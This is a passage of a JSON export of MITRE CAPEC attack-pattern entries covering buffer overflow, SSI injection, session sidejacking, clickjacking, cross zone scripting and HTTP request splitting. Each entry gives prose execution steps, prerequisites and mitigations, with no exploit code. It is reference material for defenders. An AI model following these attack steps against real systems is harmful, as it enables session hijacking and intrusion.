NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["Targeted software performs buffer operations.","Targeted software inadequately performs bounds-checking on buffer operations.","Adversary has the capability to influence the input to buffer operations."]},"Skills_Required":{"Skill":["In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content.",{"Level":"Low"},"In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries\' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system."},"Indicators":{"Indicator":"An attack designed to leverage a buffer overflow and redirect execution as per the adversary\'s bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the adversary would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use secure functions not vulnerable to buffer overflow.","If you have to use dangerous functions, make sure that you do boundary checking.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution.","Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software."]},"Example_Instances":{"Example":["The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.","Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"131"},{"CWE_ID":"129"},{"CWE_ID":"805"},{"CWE_ID":"680"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"07","Entry_Name":"Buffer Overflow"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Buffer overflow attack"}]},"References":{"Reference":{"External_Reference_ID":"REF-620","Section":"Buffer Overflow"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Indicators-Warnings_of_Attack, Probing_Techniques, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"101":{"ID":"101","Name":"Server Side Include (SSI) Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"253"},{"Nature":"CanPrecede","CAPEC_ID":"600"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine applicability] The adversary determines whether server side includes are enabled on the target web server.","Technique":["Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.","Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it."]},{"Step":"2","Phase":"Experiment","Description":"[Find Injection Point] Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms."]},{"Step":"3","Phase":"Exploit","Description":"[Inject SSI] Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary."}]},"Prerequisites":{"Prerequisite":["A web server that supports server side includes and has them enabled","User controllable input that can carry include directives to the web server"]},"Skills_Required":{"Skill":["The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them","All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive","Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead"]},"Example_Instances":{"Example":{"p":["Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \\"Options Includes\\" directive enabled.","Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.","When these logs are eventually reviewed, the server parses the SSI directives and executes them."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"97"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"36","Entry_Name":"SSI Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Server-Side Includes (SSI) Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-610","Section":"Testing for SSI Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"102":{"ID":"102","Name":"Session Sidejacking","Abstraction":"Detailed","Status":"Draft","Description":"Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Detect Unprotected Session Token Transfer] The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.","Technique":"The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens."},{"Step":"2","Phase":"Experiment","Description":"[Capture session token] The attacker uses sniffing tools to capture a session token from traffic."},{"Step":"3","Phase":"Experiment","Description":"[Insert captured session token] The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation."},{"Step":"4","Phase":"Exploit","Description":"[Session Token Exploitation] The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim."}]},"Prerequisites":{"Prerequisite":["An attacker and the victim are both using the same WiFi network.","The victim has an active session with a target system.","The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)","The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \\"rings home\\" asynchronously using the session token"]},"Skills_Required":{"Skill":["Easy to use tools exist to automate this attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A packet sniffing tool, such as wireshark, can be used to capture session information."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.","Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks."]},"Example_Instances":{"Example":"The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user\'s session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim\'s session token is now flowing unencrypted between the victim\'s browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim\'s hosted e-mail account."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"294"},{"CWE_ID":"522"},{"CWE_ID":"523"},{"CWE_ID":"319"},{"CWE_ID":"614"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}]}},"103":{"ID":"103","Name":"Clickjacking","Abstraction":"Standard","Status":"Draft","Description":"In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different system. While being logged in to some target system, the victim visits the adversary\'s malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Craft a clickjacking page] The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page","Technique":["The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page","The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page","The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page","The adversary leveraged cross-frame scripting to craft a malicious clickjacking page"]},{"Step":"2","Phase":"Exploit","Description":"[Adversary lures victim to clickjacking page] Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.","Technique":["Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.","Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.","Lure the victim to the malicious site through a cross-site scripting attack."]},{"Step":"3","Phase":"Exploit","Description":"[Trick victim into interacting with the clickjacking page in the desired manner] The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim\'s level of privilege.","Technique":["Hide action controls over very commonly used functionality.","Hide action controls over very psychologically tempting content."]}]},"Prerequisites":{"Prerequisite":["The victim is communicating with the target application via a web based UI and not a thick client","The victim\'s browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.","The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)","The victim has an active session with the target system.","The target system\'s interaction window is open in the victim\'s browser and supports the ability for initiating sensitive actions on behalf of the user in the target system"]},"Skills_Required":{"Skill":["Crafting the proper malicious site and luring the victim to this site are not trivial tasks.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.","Turn off JavaScript, Flash and disable CSS.","When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks."]},"Example_Instances":{"Example":{"p":["A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today\'s news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the \'skip this ad\' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.","In reality, the victim activated a hidden action control located in a transparent layer above the \'skip this ad\' button. The ad screen blocking the news article made it likely that the victim would click on the \'skip this ad\' button. Clicking on the button, actually initiated the transfer of $1000 from the victim\'s account with an electronic payment service to an adversary\'s account. Clicking on the \'skip this ad\' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Clickjacking"}},"References":{"Reference":{"External_Reference_ID":"REF-619","Section":"Testing for Clickjacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"104":{"ID":"104","Name":"Cross Zone Scripting","Abstraction":"Standard","Status":"Draft","Description":"An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers\' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \\"Restful Privilege Escalation\\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find systems susceptible to the attack] Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.","Technique":"Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place."},{"Step":"2","Phase":"Experiment","Description":"[Find the insertion point for the payload] The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user\'s browser needs to be within the local machine zone.","Technique":"Finding weaknesses in functionality used by both privileged and unprivileged users."},{"Step":"3","Phase":"Exploit","Description":"[Craft and inject the payload] Develop the payload to be executed in the higher privileged zone in the user\'s browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.","Technique":["The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.","Leverage cross-site scripting vulnerability to inject payload."]}]},"Prerequisites":{"Prerequisite":"The target must be using a zone-aware browser."},"Skills_Required":{"Skill":["Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Disable script execution.","Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone","Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone","Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum","Ensure proper HTML output encoding before writing user supplied data to the page"]},"Example_Instances":{"Example":"There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \\"add video to chat\\" feature on attacker\'s video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \\"Add video to chat\\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers\' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim\'s host system could be executed)."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"638"},{"CWE_ID":"285"},{"CWE_ID":"116"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"}]}},"105":{"ID":"105","Name":"HTTP Request Splitting","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.","This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise a",{"em":"back-end HTTP agent"},"HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"34"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:","to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.","Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant."],"ul":{"li":["additional HTTP Requests with their own headers","malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)","adversary chosen encoding (e.g., UTF-7)"]}},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Request Splitting attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP headers capable of being user-manipulated.","HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses."},"Indicators":{"Indicator":"Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":{"p":"Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"138"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"24","Entry_Name":"HTTP Request Splitting"}},"References":{"Reference":[{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-679"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 